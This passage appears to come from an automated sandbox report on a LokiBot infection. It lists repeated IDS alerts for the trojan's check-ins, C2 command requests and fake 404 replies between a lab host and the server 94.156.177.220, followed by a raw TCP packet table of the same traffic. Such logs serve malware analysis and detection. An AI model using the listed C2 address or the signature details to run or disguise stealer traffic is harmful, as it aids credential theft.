                                  2024-10-25T10:21:36.772729+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.450014TCP
                                  2024-10-25T10:21:36.922599+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45002194.156.177.22080TCP
                                  2024-10-25T10:21:36.922599+02002025381ET MALWARE LokiBot Checkin1192.168.2.45002194.156.177.22080TCP
                                  2024-10-25T10:21:36.922599+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45002194.156.177.22080TCP
                                  2024-10-25T10:21:37.890035+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45002194.156.177.22080TCP
                                  2024-10-25T10:21:37.890035+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45002194.156.177.22080TCP
                                  2024-10-25T10:21:37.895860+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.450021TCP
                                  2024-10-25T10:21:38.071599+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45002794.156.177.22080TCP
                                  2024-10-25T10:21:38.071599+02002025381ET MALWARE LokiBot Checkin1192.168.2.45002794.156.177.22080TCP
                                  2024-10-25T10:21:38.071599+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45002794.156.177.22080TCP
                                  2024-10-25T10:21:39.040400+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45002794.156.177.22080TCP
                                  2024-10-25T10:21:39.040400+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45002794.156.177.22080TCP
                                  2024-10-25T10:21:39.046534+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.450027TCP
                                  2024-10-25T10:21:39.204843+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45003394.156.177.22080TCP
                                  2024-10-25T10:21:39.204843+02002025381ET MALWARE LokiBot Checkin1192.168.2.45003394.156.177.22080TCP
                                  2024-10-25T10:21:39.204843+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45003394.156.177.22080TCP
                                  2024-10-25T10:21:40.344341+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45003394.156.177.22080TCP
                                  2024-10-25T10:21:40.344341+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45003394.156.177.22080TCP
                                  2024-10-25T10:21:40.350403+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.450033TCP
                                  2024-10-25T10:21:40.499810+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45003994.156.177.22080TCP
                                  2024-10-25T10:21:40.499810+02002025381ET MALWARE LokiBot Checkin1192.168.2.45003994.156.177.22080TCP
                                  2024-10-25T10:21:40.499810+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45003994.156.177.22080TCP
                                  2024-10-25T10:21:41.490818+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45003994.156.177.22080TCP
                                  2024-10-25T10:21:41.490818+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45003994.156.177.22080TCP
                                  2024-10-25T10:21:41.496560+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.450039TCP
                                  2024-10-25T10:21:41.653914+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45005094.156.177.22080TCP
                                  2024-10-25T10:21:41.653914+02002025381ET MALWARE LokiBot Checkin1192.168.2.45005094.156.177.22080TCP
                                  2024-10-25T10:21:41.653914+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45005094.156.177.22080TCP
                                  2024-10-25T10:21:42.628356+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45005094.156.177.22080TCP
                                  2024-10-25T10:21:42.628356+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45005094.156.177.22080TCP
                                  2024-10-25T10:21:42.635640+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.450050TCP
                                  2024-10-25T10:21:42.775266+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45005694.156.177.22080TCP
                                  2024-10-25T10:21:42.775266+02002025381ET MALWARE LokiBot Checkin1192.168.2.45005694.156.177.22080TCP
                                  2024-10-25T10:21:42.775266+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45005694.156.177.22080TCP
                                  2024-10-25T10:21:43.771661+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45005694.156.177.22080TCP
                                  2024-10-25T10:21:43.771661+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45005694.156.177.22080TCP
                                  2024-10-25T10:21:43.777737+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.450056TCP
                                  2024-10-25T10:21:43.937769+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45006294.156.177.22080TCP
                                  2024-10-25T10:21:43.937769+02002025381ET MALWARE LokiBot Checkin1192.168.2.45006294.156.177.22080TCP
                                  2024-10-25T10:21:43.937769+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45006294.156.177.22080TCP
                                  2024-10-25T10:21:44.922014+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45006294.156.177.22080TCP
                                  2024-10-25T10:21:44.922014+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45006294.156.177.22080TCP
                                  2024-10-25T10:21:44.927929+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.450062TCP
                                  2024-10-25T10:21:45.077227+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45007394.156.177.22080TCP
                                  2024-10-25T10:21:45.077227+02002025381ET MALWARE LokiBot Checkin1192.168.2.45007394.156.177.22080TCP
                                  2024-10-25T10:21:45.077227+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45007394.156.177.22080TCP
                                  2024-10-25T10:21:46.047555+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45007394.156.177.22080TCP
                                  2024-10-25T10:21:46.047555+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45007394.156.177.22080TCP
                                  2024-10-25T10:21:46.053961+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.450073TCP
                                  2024-10-25T10:21:46.202323+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45007894.156.177.22080TCP
                                  2024-10-25T10:21:46.202323+02002025381ET MALWARE LokiBot Checkin1192.168.2.45007894.156.177.22080TCP
                                  2024-10-25T10:21:46.202323+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45007894.156.177.22080TCP
                                  2024-10-25T10:21:47.209475+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45007894.156.177.22080TCP
                                  2024-10-25T10:21:47.209475+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45007894.156.177.22080TCP
                                  2024-10-25T10:21:47.216255+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.450078TCP
                                  2024-10-25T10:21:47.377458+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45008594.156.177.22080TCP
                                  2024-10-25T10:21:47.377458+02002025381ET MALWARE LokiBot Checkin1192.168.2.45008594.156.177.22080TCP
                                  2024-10-25T10:21:47.377458+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45008594.156.177.22080TCP
                                  2024-10-25T10:21:48.343222+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45008594.156.177.22080TCP
                                  2024-10-25T10:21:48.343222+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45008594.156.177.22080TCP
                                  2024-10-25T10:21:48.349012+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.450085TCP
                                  2024-10-25T10:21:48.502508+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45008894.156.177.22080TCP
                                  2024-10-25T10:21:48.502508+02002025381ET MALWARE LokiBot Checkin1192.168.2.45008894.156.177.22080TCP
                                  2024-10-25T10:21:48.502508+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45008894.156.177.22080TCP
                                  2024-10-25T10:21:49.489044+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45008894.156.177.22080TCP
                                  2024-10-25T10:21:49.489044+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45008894.156.177.22080TCP
                                  2024-10-25T10:21:49.494903+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.450088TCP
                                  2024-10-25T10:21:49.659829+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45008994.156.177.22080TCP
                                  2024-10-25T10:21:49.659829+02002025381ET MALWARE LokiBot Checkin1192.168.2.45008994.156.177.22080TCP
                                  2024-10-25T10:21:49.659829+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45008994.156.177.22080TCP
                                  2024-10-25T10:21:50.627196+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45008994.156.177.22080TCP
                                  2024-10-25T10:21:50.627196+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45008994.156.177.22080TCP
                                  2024-10-25T10:21:50.633330+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.450089TCP
                                  2024-10-25T10:21:51.498324+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45009094.156.177.22080TCP
                                  2024-10-25T10:21:51.498324+02002025381ET MALWARE LokiBot Checkin1192.168.2.45009094.156.177.22080TCP
                                  2024-10-25T10:21:51.498324+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45009094.156.177.22080TCP
                                  2024-10-25T10:21:52.356229+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45009094.156.177.22080TCP
                                  2024-10-25T10:21:52.356229+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45009094.156.177.22080TCP
                                  2024-10-25T10:21:52.362707+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.450090TCP
                                  2024-10-25T10:21:52.518212+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45009194.156.177.22080TCP
                                  2024-10-25T10:21:52.518212+02002025381ET MALWARE LokiBot Checkin1192.168.2.45009194.156.177.22080TCP
                                  2024-10-25T10:21:52.518212+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45009194.156.177.22080TCP
                                  2024-10-25T10:21:53.474653+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45009194.156.177.22080TCP
                                  2024-10-25T10:21:53.474653+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45009194.156.177.22080TCP
                                  2024-10-25T10:21:53.481146+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.450091TCP
                                  2024-10-25T10:21:53.649173+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45009294.156.177.22080TCP
                                  2024-10-25T10:21:53.649173+02002025381ET MALWARE LokiBot Checkin1192.168.2.45009294.156.177.22080TCP
                                  2024-10-25T10:21:53.649173+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45009294.156.177.22080TCP
                                  2024-10-25T10:21:54.628216+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45009294.156.177.22080TCP
                                  2024-10-25T10:21:54.628216+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45009294.156.177.22080TCP
                                  2024-10-25T10:21:54.634280+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.450092TCP
                                  2024-10-25T10:21:54.809440+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45009394.156.177.22080TCP
                                  2024-10-25T10:21:54.809440+02002025381ET MALWARE LokiBot Checkin1192.168.2.45009394.156.177.22080TCP
                                  2024-10-25T10:21:54.809440+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45009394.156.177.22080TCP
                                  2024-10-25T10:21:55.755063+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45009394.156.177.22080TCP
                                  2024-10-25T10:21:55.755063+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45009394.156.177.22080TCP
                                  2024-10-25T10:21:55.761443+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.450093TCP
                                  2024-10-25T10:21:55.924734+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45009494.156.177.22080TCP
                                  2024-10-25T10:21:55.924734+02002025381ET MALWARE LokiBot Checkin1192.168.2.45009494.156.177.22080TCP
                                  2024-10-25T10:21:55.924734+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45009494.156.177.22080TCP
                                  2024-10-25T10:21:56.895578+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45009494.156.177.22080TCP
                                  2024-10-25T10:21:56.895578+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45009494.156.177.22080TCP
                                  2024-10-25T10:21:56.901726+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.450094TCP
                                  2024-10-25T10:21:57.172837+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45009594.156.177.22080TCP
                                  2024-10-25T10:21:57.172837+02002025381ET MALWARE LokiBot Checkin1192.168.2.45009594.156.177.22080TCP
                                  2024-10-25T10:21:57.172837+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45009594.156.177.22080TCP
                                  2024-10-25T10:21:58.166256+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45009594.156.177.22080TCP
                                  2024-10-25T10:21:58.166256+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45009594.156.177.22080TCP
                                  2024-10-25T10:21:58.172981+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.450095TCP
                                  2024-10-25T10:21:58.339192+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45009694.156.177.22080TCP
                                  2024-10-25T10:21:58.339192+02002025381ET MALWARE LokiBot Checkin1192.168.2.45009694.156.177.22080TCP
                                  2024-10-25T10:21:58.339192+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45009694.156.177.22080TCP
                                  2024-10-25T10:21:59.355701+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45009694.156.177.22080TCP
                                  2024-10-25T10:21:59.355701+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45009694.156.177.22080TCP
                                  2024-10-25T10:21:59.361507+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.450096TCP
                                  2024-10-25T10:21:59.527535+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45009794.156.177.22080TCP
                                  2024-10-25T10:21:59.527535+02002025381ET MALWARE LokiBot Checkin1192.168.2.45009794.156.177.22080TCP
                                  2024-10-25T10:21:59.527535+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45009794.156.177.22080TCP
                                  2024-10-25T10:22:00.539507+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45009794.156.177.22080TCP
                                  2024-10-25T10:22:00.539507+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45009794.156.177.22080TCP
                                  2024-10-25T10:22:00.545385+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.450097TCP
                                  2024-10-25T10:22:01.017571+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45009894.156.177.22080TCP
                                  2024-10-25T10:22:01.017571+02002025381ET MALWARE LokiBot Checkin1192.168.2.45009894.156.177.22080TCP
                                  2024-10-25T10:22:01.017571+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45009894.156.177.22080TCP
                                  2024-10-25T10:22:02.033727+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45009894.156.177.22080TCP
                                  2024-10-25T10:22:02.033727+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45009894.156.177.22080TCP
                                  2024-10-25T10:22:02.039544+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.450098TCP
                                  2024-10-25T10:22:02.183819+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45009994.156.177.22080TCP
                                  2024-10-25T10:22:02.183819+02002025381ET MALWARE LokiBot Checkin1192.168.2.45009994.156.177.22080TCP
                                  2024-10-25T10:22:02.183819+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45009994.156.177.22080TCP
                                  2024-10-25T10:22:03.140267+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45009994.156.177.22080TCP
                                  2024-10-25T10:22:03.140267+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45009994.156.177.22080TCP
                                  2024-10-25T10:22:03.146388+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.450099TCP
                                  2024-10-25T10:22:04.446102+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45010094.156.177.22080TCP
                                  2024-10-25T10:22:04.446102+02002025381ET MALWARE LokiBot Checkin1192.168.2.45010094.156.177.22080TCP
                                  2024-10-25T10:22:04.446102+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45010094.156.177.22080TCP
                                  2024-10-25T10:22:05.410348+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45010094.156.177.22080TCP
                                  2024-10-25T10:22:05.410348+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45010094.156.177.22080TCP
                                  2024-10-25T10:22:05.416568+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.450100TCP
                                  2024-10-25T10:22:05.576112+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45010194.156.177.22080TCP
                                  2024-10-25T10:22:05.576112+02002025381ET MALWARE LokiBot Checkin1192.168.2.45010194.156.177.22080TCP
                                  2024-10-25T10:22:05.576112+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45010194.156.177.22080TCP
                                  2024-10-25T10:22:06.540301+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45010194.156.177.22080TCP
                                  2024-10-25T10:22:06.540301+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45010194.156.177.22080TCP
                                  2024-10-25T10:22:06.546217+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.450101TCP
                                  2024-10-25T10:22:06.709690+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45010294.156.177.22080TCP
                                  2024-10-25T10:22:06.709690+02002025381ET MALWARE LokiBot Checkin1192.168.2.45010294.156.177.22080TCP
                                  2024-10-25T10:22:06.709690+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45010294.156.177.22080TCP
                                  2024-10-25T10:22:07.717612+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45010294.156.177.22080TCP
                                  2024-10-25T10:22:07.717612+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45010294.156.177.22080TCP
                                  2024-10-25T10:22:07.827411+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.450102TCP
                                  TimestampSource PortDest PortSource IPDest IP
                                  Oct 25, 2024 10:20:01.406461000 CEST4973080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:01.415404081 CEST804973094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:01.415537119 CEST4973080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:01.417874098 CEST4973080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:01.423949957 CEST804973094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:01.424021959 CEST4973080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:01.430246115 CEST804973094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:02.396137953 CEST804973094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:02.412266970 CEST4973080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:02.418374062 CEST804973094.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:02.418469906 CEST4973080192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:03.034248114 CEST4973180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:03.040108919 CEST804973194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:03.040198088 CEST4973180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:03.042490005 CEST4973180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:03.047882080 CEST804973194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:03.047947884 CEST4973180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:03.053308964 CEST804973194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:04.019900084 CEST804973194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:04.020145893 CEST4973180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:04.025937080 CEST804973194.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:04.026000023 CEST4973180192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:04.079574108 CEST4973280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:04.085165024 CEST804973294.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:04.085272074 CEST4973280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:04.087390900 CEST4973280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:04.092864037 CEST804973294.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:04.092936039 CEST4973280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:04.098952055 CEST804973294.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:05.060925961 CEST804973294.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:05.061101913 CEST4973280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:05.071273088 CEST804973294.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:05.071409941 CEST4973280192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:05.217653990 CEST4973380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:05.223222017 CEST804973394.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:05.223352909 CEST4973380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:05.225447893 CEST4973380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:05.231029034 CEST804973394.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:05.231107950 CEST4973380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:05.238399029 CEST804973394.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:06.203742981 CEST804973394.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:06.219415903 CEST4973380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:06.226237059 CEST804973394.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:06.226308107 CEST4973380192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:06.359038115 CEST4973480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:06.364835024 CEST804973494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:06.364921093 CEST4973480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:06.367363930 CEST4973480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:06.375502110 CEST804973494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:06.375575066 CEST4973480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:06.381289959 CEST804973494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:07.328375101 CEST804973494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:07.328676939 CEST4973480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:07.334472895 CEST804973494.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:07.335333109 CEST4973480192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:07.471416950 CEST4973580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:07.477169037 CEST804973594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:07.477252007 CEST4973580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:07.479399920 CEST4973580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:07.485313892 CEST804973594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:07.485394001 CEST4973580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:07.494689941 CEST804973594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:09.431647062 CEST804973594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:09.431886911 CEST4973580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:09.432485104 CEST804973594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:09.432543039 CEST4973580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:09.432574987 CEST804973594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:09.432626963 CEST4973580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:09.432967901 CEST804973594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:09.433017015 CEST4973580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:09.433762074 CEST804973594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:09.433809996 CEST4973580192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:09.437349081 CEST804973594.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:09.581207037 CEST4973680192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:09.586941957 CEST804973694.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:09.587016106 CEST4973680192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:09.590027094 CEST4973680192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:09.597122908 CEST804973694.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:09.597187996 CEST4973680192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:09.606405973 CEST804973694.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:10.553689957 CEST804973694.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:10.553812981 CEST4973680192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:10.560447931 CEST804973694.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:10.560514927 CEST4973680192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:10.702167988 CEST4973780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:10.707597017 CEST804973794.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:10.707724094 CEST4973780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:10.709742069 CEST4973780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:10.715065002 CEST804973794.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:10.715159893 CEST4973780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:10.720493078 CEST804973794.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:11.671643019 CEST804973794.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:11.713418007 CEST4973780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:11.719388962 CEST804973794.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:11.719474077 CEST4973780192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:12.296291113 CEST4973880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:12.302164078 CEST804973894.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:12.302246094 CEST4973880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:12.304312944 CEST4973880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:12.310060978 CEST804973894.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:12.310127020 CEST4973880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:12.315501928 CEST804973894.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:13.293423891 CEST804973894.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:13.293591976 CEST4973880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:13.299727917 CEST804973894.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:13.299810886 CEST4973880192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:13.438617945 CEST4973980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:13.444540024 CEST804973994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:13.444662094 CEST4973980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:13.446667910 CEST4973980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:13.452518940 CEST804973994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:13.452611923 CEST4973980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:13.458034039 CEST804973994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:14.398870945 CEST804973994.156.177.220192.168.2.4
                                  Oct 25, 2024 10:20:14.398997068 CEST4973980192.168.2.494.156.177.220
                                  Oct 25, 2024 10:20:14.406008959 CEST804973994.156.177.220192.168.2.4
